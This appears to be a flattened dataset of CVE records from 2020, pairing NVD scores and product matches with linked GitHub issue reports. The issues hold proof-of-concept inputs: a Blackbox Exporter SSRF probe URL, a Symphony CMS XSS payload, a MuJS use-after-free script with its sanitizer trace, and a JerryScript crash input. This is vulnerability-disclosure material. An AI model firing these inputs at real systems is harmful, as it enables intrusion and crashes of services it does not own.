[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:prometheus:blackbox_exporter:*:*:*:*:*:*:*:*", "matchCriteriaId": "52D6034A-7D2F-4E19-ABF5-579ACAC6DC14", "versionEndExcluding": null, "versionEndIncluding": "0.17.0", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "918" ]
918
https://github.com/prometheus/blackbox_exporter/issues/669
[ "Exploit", "Third Party Advisory" ]
github.com
[ "prometheus", "blackbox_exporter" ]
SSRF Vulnerablity During the company's penetration test, it was found that the Blackbox > Exporter service was opened on the Internet, which led to the ssrf > detection of the company's internal network > > Set up the Blackbox Exporter test environment, and then visit: > > http://123.123.123.123:9115/probe?target=hadoop.corp.xxxxxx.com&module=http_2xx&debug=true > > > Blackbox Exporter logs service jump will be displayed > http://hadoop.corp.xxxxxx.com/cluster > > As long as the target is replaced, the service of detecting internal > service weakness can be realized > > Also supports other protocols > Blackbox Exporter is a service to test the state of network > connectivity. If it is configured incorrectly, SSRF can detect weak > services and applications in the internal network. CVE-2020-16248
Prometheus Blackbox Exporter through 0.17.0 allows /probe?target= SSRF.
https://api.github.com/repos/prometheus/blackbox_exporter/issues/669/comments
8
2020-08-03T02:20:15Z
2020-08-14T09:43:12Z
https://github.com/prometheus/blackbox_exporter/issues/669
671,747,939
669
1,373
CVE-2020-17479
2020-08-10T20:15:11.673
jpv (aka Json Pattern Validator) before 2.2.2 does not properly validate input, as demonstrated by a corrupted array.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://blog.sonatype.com/cve-2020-17479" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/manvel-khnkoyan/jpv/commit/e3eec1215caa8d5c560f5e88d0943422831927d6" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/manvel-khnkoyan/jpv/issues/10" }, { "source": "cve@mitre.org", "tags": [ "Product", "Third Party Advisory" ], "url": "https://www.npmjs.com/package/jpv" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://blog.sonatype.com/cve-2020-17479" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/manvel-khnkoyan/jpv/commit/e3eec1215caa8d5c560f5e88d0943422831927d6" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/manvel-khnkoyan/jpv/issues/10" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Product", "Third Party Advisory" ], "url": "https://www.npmjs.com/package/jpv" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:json_pattern_validator_project:json_pattern_validator:*:*:*:*:*:node.js:*:*", "matchCriteriaId": "4C1CCE0A-33EB-4196-A1CF-72CAD459CC70", "versionEndExcluding": "2.2.2", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "20" ]
20
https://github.com/manvel-khnkoyan/jpv/issues/10
[ "Exploit", "Third Party Advisory" ]
github.com
[ "manvel-khnkoyan", "jpv" ]
Hello, I'm a security researcher at Sonatype, and I discovered a potential vulnerability in this project. Do you have a preferred way for me to share the details privately, or do you want me to just show you what I've got on this GitHub issue?
Validation Bypass
https://api.github.com/repos/manvel-khnkoyan/jpv/issues/10/comments
3
2020-08-06T20:07:51Z
2020-08-19T10:37:57Z
https://github.com/manvel-khnkoyan/jpv/issues/10
674,570,517
10
1,374
CVE-2020-15071
2020-08-11T18:15:13.020
content/content.blueprintsevents.php in Symphony CMS 3.0.0 allows XSS via fields['name'] to appendSubheading.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/symphonycms/symphonycms/issues/2917" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/symphonycms/symphonycms/issues/2917" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:getsymphony:symphony:3.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "8AE817F8-2BFA-44BD-ABB1-5F011285A168", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/symphonycms/symphonycms/issues/2917
[ "Exploit", "Third Party Advisory" ]
github.com
[ "symphonycms", "symphonycms" ]
https://github.com/symphonycms/symphonycms/blob/master/symphony/content/content.blueprintsevents.php `$about = General::array_map_recursive('stripslashes', $existing->about());` .... .... .... `$this->appendSubheading(($isEditing ? $about['name'] : __('Untitled')))` .... .... .... ``` public function appendSubheading($value, $actions = null) { if (!is_array($actions) && $actions) { // Backward compatibility $actions = array($actions); } if (!empty($actions)) { foreach ($actions as $a) { $this->insertAction($a); } } $this->Breadcrumbs->appendChild(new XMLElement('h2', $value, array('role' => 'heading', 'id' => 'symphony-subheading'))); } ``` Here data from $_POST to HTML allows attacker to trigger an XSS with payload llike fields['name']=a<script>alert(1)</script> ![image](https://user-images.githubusercontent.com/8120951/84968829-f20eb300-b149-11ea-9d3c-8e19167cbb8a.png)
XSS vulnerability
https://api.github.com/repos/symphonycms/symphonycms/issues/2917/comments
1
2020-06-18T01:57:47Z
2020-06-18T02:02:36Z
https://github.com/symphonycms/symphonycms/issues/2917
640,848,737
2,917
1,375
CVE-2020-17495
2020-08-11T21:15:10.943
django-celery-results through 1.2.1 stores task results in the database. Among the data it stores are the variables passed into the tasks. The variables may contain sensitive cleartext information that does not belong unencrypted in the database.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/celery/django-celery-results/issues/142" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/celery/django-celery-results/issues/142" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:django-celery-results_project:django-celery-results:*:*:*:*:*:*:*:*", "matchCriteriaId": "41339B4A-04CD-4B0B-B108-06334AA4D183", "versionEndExcluding": null, "versionEndIncluding": "1.2.1", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "312" ]
312
https://github.com/celery/django-celery-results/issues/142
[ "Third Party Advisory" ]
github.com
[ "celery", "django-celery-results" ]
Hi, apologies if this is documented somewhere (I can't find it), but is there a quick way not to store the arguments that were passed to the celery task? Some of my tasks take in potentially sensitive information, and I would prefer not to have a permanent record of them inside of my database (I'm also looking at encrypting this information, but would prefer not to store it regardless).
Question: Disable storing of task arguments
https://api.github.com/repos/celery/django-celery-results/issues/142/comments
16
2020-04-13T19:27:43Z
2022-07-09T19:59:02Z
https://github.com/celery/django-celery-results/issues/142
599,084,913
142
1,376
CVE-2020-24343
2020-08-13T19:15:13.677
Artifex MuJS through 1.0.7 has a use-after-free in jsrun.c because of unconditional marking in jsgc.c.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/ccxvii/mujs/issues/136" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/ccxvii/mujs/issues/136" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:artifex:mujs:*:*:*:*:*:*:*:*", "matchCriteriaId": "CE48D58D-92C2-4D2E-88FA-EF18351637F5", "versionEndExcluding": null, "versionEndIncluding": "1.0.7", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "416" ]
416
https://github.com/ccxvii/mujs/issues/136
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "ccxvii", "mujs" ]
git hash: `9f3e141d805cddec7cce1fae38373a82c61e3300` cmd: `mujs poc.js` POC: ```javascript b = false function c() { if (!b) { function c() { this[a = this] = a} JSON.parse("[]", c) this[2] = a } b = true return this[Array(a = Array(1, 2, true) ,{})] = a } JSON.parse("[]", function() { JSON.parse("[1, 2, []]", c)}) ``` Stack dump: ``` mujs_poc1.js:4: warning: function statements are not standard ================================================================= ==86449==ERROR: AddressSanitizer: heap-use-after-free on address 0x611000000238 at pc 0x55a8217a28a0 bp 0x7fff89b82e90 sp 0x7fff89b82e80 READ of size 2 at 0x611000000238 thread T0 #0 0x55a8217a289f in jsR_run /home/yongheng/mujs/jsrun.c:1362 #1 0x55a82179ef73 in jsR_callfunction /home/yongheng/mujs/jsrun.c:1016 #2 0x55a82179ff94 in js_call /home/yongheng/mujs/jsrun.c:1118 #3 0x55a821783913 in jsonrevive /home/yongheng/mujs/json.c:149 #4 0x55a821783738 in jsonrevive /home/yongheng/mujs/json.c:120 #5 0x55a8217837fa in jsonrevive /home/yongheng/mujs/json.c:132 #6 0x55a8217837fa in jsonrevive /home/yongheng/mujs/json.c:132 #7 0x55a8217837fa in jsonrevive /home/yongheng/mujs/json.c:132 #8 0x55a8217837fa in jsonrevive /home/yongheng/mujs/json.c:132 #9 0x55a8217837fa in jsonrevive /home/yongheng/mujs/json.c:132 #10 0x55a8217837fa in jsonrevive /home/yongheng/mujs/json.c:132 #11 0x55a8217837fa in jsonrevive /home/yongheng/mujs/json.c:132 #12 0x55a8217837fa in jsonrevive /home/yongheng/mujs/json.c:132 #13 0x55a8217837fa in jsonrevive /home/yongheng/mujs/json.c:132 #14 0x55a8217837fa in jsonrevive /home/yongheng/mujs/json.c:132 #15 0x55a8217837fa in jsonrevive /home/yongheng/mujs/json.c:132 #16 0x55a8217837fa in jsonrevive /home/yongheng/mujs/json.c:132 #17 0x55a8217837fa in jsonrevive /home/yongheng/mujs/json.c:132 #18 0x55a8217837fa in jsonrevive /home/yongheng/mujs/json.c:132 #19 0x55a8217837fa in jsonrevive /home/yongheng/mujs/json.c:132 #20 0x55a8217837fa in jsonrevive /home/yongheng/mujs/json.c:132 #21 0x55a8217837fa in jsonrevive /home/yongheng/mujs/json.c:132 #22 0x55a8217837fa in jsonrevive /home/yongheng/mujs/json.c:132 #23 0x55a8217837fa in jsonrevive /home/yongheng/mujs/json.c:132 #24 0x55a8217837fa in jsonrevive /home/yongheng/mujs/json.c:132 #25 0x55a8217837fa in jsonrevive /home/yongheng/mujs/json.c:132 #26 0x55a8217837fa in jsonrevive /home/yongheng/mujs/json.c:132 #27 0x55a8217837fa in jsonrevive /home/yongheng/mujs/json.c:132 #28 0x55a8217837fa in jsonrevive /home/yongheng/mujs/json.c:132 #29 0x55a8217837fa in jsonrevive /home/yongheng/mujs/json.c:132 #30 0x55a8217837fa in jsonrevive /home/yongheng/mujs/json.c:132 #31 0x55a8217837fa in jsonrevive /home/yongheng/mujs/json.c:132 #32 0x55a8217837fa in jsonrevive /home/yongheng/mujs/json.c:132 #33 0x55a8217837fa in jsonrevive /home/yongheng/mujs/json.c:132 #34 0x55a8217837fa in jsonrevive /home/yongheng/mujs/json.c:132 #35 0x55a8217837fa in jsonrevive /home/yongheng/mujs/json.c:132 #36 0x55a8217837fa in jsonrevive /home/yongheng/mujs/json.c:132 #37 0x55a8217837fa in jsonrevive /home/yongheng/mujs/json.c:132 #38 0x55a8217837fa in jsonrevive /home/yongheng/mujs/json.c:132 #39 0x55a8217837fa in jsonrevive /home/yongheng/mujs/json.c:132 #40 0x55a8217837fa in jsonrevive /home/yongheng/mujs/json.c:132 #41 0x55a8217837fa in jsonrevive /home/yongheng/mujs/json.c:132 #42 0x55a8217837fa in jsonrevive /home/yongheng/mujs/json.c:132 #43 0x55a8217837fa in jsonrevive /home/yongheng/mujs/json.c:132 #44 0x55a8217837fa in jsonrevive /home/yongheng/mujs/json.c:132 #45 0x55a8217837fa in jsonrevive /home/yongheng/mujs/json.c:132 #46 0x55a8217837fa in jsonrevive /home/yongheng/mujs/json.c:132 #47 0x55a8217837fa in jsonrevive /home/yongheng/mujs/json.c:132 #48 0x55a8217837fa in jsonrevive /home/yongheng/mujs/json.c:132 #49 0x55a8217837fa in jsonrevive /home/yongheng/mujs/json.c:132 #50 0x55a8217837fa in jsonrevive /home/yongheng/mujs/json.c:132 #51 0x55a8217837fa in jsonrevive /home/yongheng/mujs/json.c:132 #52 0x55a8217837fa in jsonrevive /home/yongheng/mujs/json.c:132 #53 0x55a8217837fa in jsonrevive /home/yongheng/mujs/json.c:132 #54 0x55a8217837fa in jsonrevive /home/yongheng/mujs/json.c:132 #55 0x55a8217837fa in jsonrevive /home/yongheng/mujs/json.c:132 #56 0x55a8217837fa in jsonrevive /home/yongheng/mujs/json.c:132 #57 0x55a8217837fa in jsonrevive /home/yongheng/mujs/json.c:132 #58 0x55a8217837fa in jsonrevive /home/yongheng/mujs/json.c:132 #59 0x55a8217837fa in jsonrevive /home/yongheng/mujs/json.c:132 #60 0x55a8217837fa in jsonrevive /home/yongheng/mujs/json.c:132 #61 0x55a8217837fa in jsonrevive /home/yongheng/mujs/json.c:132 #62 0x55a8217837fa in jsonrevive /home/yongheng/mujs/json.c:132 #63 0x55a8217837fa in jsonrevive /home/yongheng/mujs/json.c:132 #64 0x55a8217837fa in jsonrevive /home/yongheng/mujs/json.c:132 #65 0x55a8217837fa in jsonrevive /home/yongheng/mujs/json.c:132 #66 0x55a8217837fa in jsonrevive /home/yongheng/mujs/json.c:132 #67 0x55a8217837fa in jsonrevive /home/yongheng/mujs/json.c:132 #68 0x55a8217837fa in jsonrevive /home/yongheng/mujs/json.c:132 #69 0x55a8217837fa in jsonrevive /home/yongheng/mujs/json.c:132 #70 0x55a8217837fa in jsonrevive /home/yongheng/mujs/json.c:132 #71 0x55a8217837fa in jsonrevive /home/yongheng/mujs/json.c:132 #72 0x55a8217837fa in jsonrevive /home/yongheng/mujs/json.c:132 #73 0x55a8217837fa in jsonrevive /home/yongheng/mujs/json.c:132 #74 0x55a8217837fa in jsonrevive /home/yongheng/mujs/json.c:132 #75 0x55a8217837fa in jsonrevive /home/yongheng/mujs/json.c:132 #76 0x55a8217837fa in jsonrevive /home/yongheng/mujs/json.c:132 #77 0x55a8217837fa in jsonrevive /home/yongheng/mujs/json.c:132 #78 0x55a8217837fa in jsonrevive /home/yongheng/mujs/json.c:132 #79 0x55a8217837fa in jsonrevive /home/yongheng/mujs/json.c:132 #80 0x55a8217837fa in jsonrevive /home/yongheng/mujs/json.c:132 #81 0x55a8217837fa in jsonrevive /home/yongheng/mujs/json.c:132 #82 0x55a8217837fa in jsonrevive /home/yongheng/mujs/json.c:132 #83 0x55a8217837fa in jsonrevive /home/yongheng/mujs/json.c:132 #84 0x55a8217837fa in jsonrevive /home/yongheng/mujs/json.c:132 #85 0x55a8217837fa in jsonrevive /home/yongheng/mujs/json.c:132 #86 0x55a8217837fa in jsonrevive /home/yongheng/mujs/json.c:132 #87 0x55a8217837fa in jsonrevive /home/yongheng/mujs/json.c:132 #88 0x55a8217837fa in jsonrevive /home/yongheng/mujs/json.c:132 #89 0x55a8217837fa in jsonrevive /home/yongheng/mujs/json.c:132 #90 0x55a8217837fa in jsonrevive /home/yongheng/mujs/json.c:132 #91 0x55a8217837fa in jsonrevive /home/yongheng/mujs/json.c:132 #92 0x55a8217837fa in jsonrevive /home/yongheng/mujs/json.c:132 #93 0x55a8217837fa in jsonrevive /home/yongheng/mujs/json.c:132 #94 0x55a8217837fa in jsonrevive /home/yongheng/mujs/json.c:132 #95 0x55a8217837fa in jsonrevive /home/yongheng/mujs/json.c:132 #96 0x55a8217837fa in jsonrevive /home/yongheng/mujs/json.c:132 #97 0x55a8217837fa in jsonrevive /home/yongheng/mujs/json.c:132 #98 0x55a8217837fa in jsonrevive /home/yongheng/mujs/json.c:132 #99 0x55a821783738 in jsonrevive /home/yongheng/mujs/json.c:120 #100 0x55a821783a2c in JSON_parse /home/yongheng/mujs/json.c:163 #101 0x55a82179f8da in jsR_callcfunction /home/yongheng/mujs/jsrun.c:1084 #102 0x55a8217a045f in js_call /home/yongheng/mujs/jsrun.c:1130 #103 0x55a8217a4038 in jsR_run /home/yongheng/mujs/jsrun.c:1558 #104 0x55a82179e957 in jsR_calllwfunction /home/yongheng/mujs/jsrun.c:973 #105 0x55a82179ff29 in js_call /home/yongheng/mujs/jsrun.c:1116 #106 0x55a821783913 in jsonrevive /home/yongheng/mujs/json.c:149 #107 0x55a821783a2c in JSON_parse /home/yongheng/mujs/json.c:163 #108 0x55a82179f8da in jsR_callcfunction /home/yongheng/mujs/jsrun.c:1084 #109 0x55a8217a045f in js_call /home/yongheng/mujs/jsrun.c:1130 #110 0x55a8217a4038 in jsR_run /home/yongheng/mujs/jsrun.c:1558 #111 0x55a82179f67d in jsR_callscript /home/yongheng/mujs/jsrun.c:1067 #112 0x55a8217a0154 in js_call /home/yongheng/mujs/jsrun.c:1122 #113 0x55a8217a60b0 in js_dofile /home/yongheng/mujs/jsstate.c:219 #114 0x55a8217bab4e in main /home/yongheng/mujs/main.c:347 #115 0x7f2a739eab96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) #116 0x55a821757c59 in _start (/home/yongheng/mujs/build/sanitize/mujs+0x16c59) 0x611000000238 is located 184 bytes inside of 256-byte region [0x611000000180,0x611000000280) freed by thread T0 here: #0 0x7f2a7447f7a8 in __interceptor_free (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xde7a8) #1 0x55a8217a54b9 in js_defaultalloc /home/yongheng/mujs/jsstate.c:18 #2 0x55a821796e26 in js_free /home/yongheng/mujs/jsrun.c:58 #3 0x55a821775238 in jsG_freefunction /home/yongheng/mujs/jsgc.c:19 #4 0x55a821777034 in js_gc /home/yongheng/mujs/jsgc.c:205 #5 0x55a8217a2856 in jsR_run /home/yongheng/mujs/jsrun.c:1360 #6 0x55a82179ef73 in jsR_callfunction /home/yongheng/mujs/jsrun.c:1016 #7 0x55a82179ff94 in js_call /home/yongheng/mujs/jsrun.c:1118 #8 0x55a821783913 in jsonrevive /home/yongheng/mujs/json.c:149 #9 0x55a821783738 in jsonrevive /home/yongheng/mujs/json.c:120 #10 0x55a8217837fa in jsonrevive /home/yongheng/mujs/json.c:132 #11 0x55a8217837fa in jsonrevive /home/yongheng/mujs/json.c:132 #12 0x55a8217837fa in jsonrevive /home/yongheng/mujs/json.c:132 #13 0x55a8217837fa in jsonrevive /home/yongheng/mujs/json.c:132 #14 0x55a8217837fa in jsonrevive /home/yongheng/mujs/json.c:132 #15 0x55a8217837fa in jsonrevive /home/yongheng/mujs/json.c:132 #16 0x55a8217837fa in jsonrevive /home/yongheng/mujs/json.c:132 #17 0x55a8217837fa in jsonrevive /home/yongheng/mujs/json.c:132 #18 0x55a8217837fa in jsonrevive /home/yongheng/mujs/json.c:132 #19 0x55a8217837fa in jsonrevive /home/yongheng/mujs/json.c:132 #20 0x55a8217837fa in jsonrevive /home/yongheng/mujs/json.c:132 #21 0x55a8217837fa in jsonrevive /home/yongheng/mujs/json.c:132 #22 0x55a8217837fa in jsonrevive /home/yongheng/mujs/json.c:132 #23 0x55a8217837fa in jsonrevive /home/yongheng/mujs/json.c:132 #24 0x55a8217837fa in jsonrevive /home/yongheng/mujs/json.c:132 #25 0x55a8217837fa in jsonrevive /home/yongheng/mujs/json.c:132 #26 0x55a8217837fa in jsonrevive /home/yongheng/mujs/json.c:132 #27 0x55a8217837fa in jsonrevive /home/yongheng/mujs/json.c:132 #28 0x55a8217837fa in jsonrevive /home/yongheng/mujs/json.c:132 #29 0x55a8217837fa in jsonrevive /home/yongheng/mujs/json.c:132 previously allocated by thread T0 here: #0 0x7f2a7447ff30 in realloc (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xdef30) #1 0x55a8217a54d5 in js_defaultalloc /home/yongheng/mujs/jsstate.c:22 #2 0x55a821796d40 in js_realloc /home/yongheng/mujs/jsrun.c:42 #3 0x55a82175cfa9 in emitraw /home/yongheng/mujs/jscompile.c:82 #4 0x55a82175d11d in emit /home/yongheng/mujs/jscompile.c:90 #5 0x55a82175e1d0 in emitstring /home/yongheng/mujs/jscompile.c:206 #6 0x55a82175e4f0 in emitlocal /home/yongheng/mujs/jscompile.c:233 #7 0x55a821760fd4 in jsC_cexp /home/yongheng/mujs/jscompile.c:657 #8 0x55a8217609e5 in ccall /home/yongheng/mujs/jscompile.c:587 #9 0x55a8217611bd in jsC_cexp /home/yongheng/mujs/jscompile.c:674 #10 0x55a82175f7e5 in cassign /home/yongheng/mujs/jscompile.c:405 #11 0x55a821761960 in jsC_cexp /home/yongheng/mujs/jscompile.c:754 #12 0x55a82175f6cb in cargs /home/yongheng/mujs/jscompile.c:392 #13 0x55a821760a15 in ccall /home/yongheng/mujs/jscompile.c:591 #14 0x55a8217611bd in jsC_cexp /home/yongheng/mujs/jscompile.c:674 #15 0x55a82175f8a2 in cassign /home/yongheng/mujs/jscompile.c:411 #16 0x55a821761960 in jsC_cexp /home/yongheng/mujs/jscompile.c:754 #17 0x55a8217648b9 in cstm /home/yongheng/mujs/jscompile.c:1268 #18 0x55a821764f93 in cstmlist /home/yongheng/mujs/jscompile.c:1332 #19 0x55a821765b80 in cfunbody /home/yongheng/mujs/jscompile.c:1433 #20 0x55a82175ce41 in newfun /home/yongheng/mujs/jscompile.c:69 #21 0x55a821765618 in cfundecs /home/yongheng/mujs/jscompile.c:1386 #22 0x55a821765a06 in cfunbody /home/yongheng/mujs/jscompile.c:1415 #23 0x55a82175ce41 in newfun /home/yongheng/mujs/jscompile.c:69 #24 0x55a821765d7b in jsC_compilescript /home/yongheng/mujs/jscompile.c:1446 #25 0x55a8217a58d1 in js_loadstringx /home/yongheng/mujs/jsstate.c:114 #26 0x55a8217a5a2d in js_loadstring /home/yongheng/mujs/jsstate.c:128 #27 0x55a8217a5f21 in js_loadfile /home/yongheng/mujs/jsstate.c:188 #28 0x55a8217a6093 in js_dofile /home/yongheng/mujs/jsstate.c:217 #29 0x55a8217bab4e in main /home/yongheng/mujs/main.c:347 SUMMARY: AddressSanitizer: heap-use-after-free /home/yongheng/mujs/jsrun.c:1362 in jsR_run Shadow bytes around the buggy address: 0x0c227fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c227fff8000: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd 0x0c227fff8010: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd 0x0c227fff8020: fd fd fd fd fd fd fd fd fa fa fa fa fa fa fa fa 0x0c227fff8030: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd =>0x0c227fff8040: fd fd fd fd fd fd fd[fd]fd fd fd fd fd fd fd fd 0x0c227fff8050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c227fff8060: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c227fff8070: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c227fff8080: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c227fff8090: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ==86449==ABORTING ```
AddressSanitizer: heap-use-after-free /home/yongheng/mujs/jsrun.c:1362 in jsR_run
https://api.github.com/repos/ccxvii/mujs/issues/136/comments
17
2020-06-28T19:13:31Z
2020-08-14T16:57:00Z
https://github.com/ccxvii/mujs/issues/136
646,987,460
136
1,377
CVE-2020-24344
2020-08-13T19:15:13.740
JerryScript through 2.3.0 has a (function({a=arguments}){const arguments}) buffer over-read.
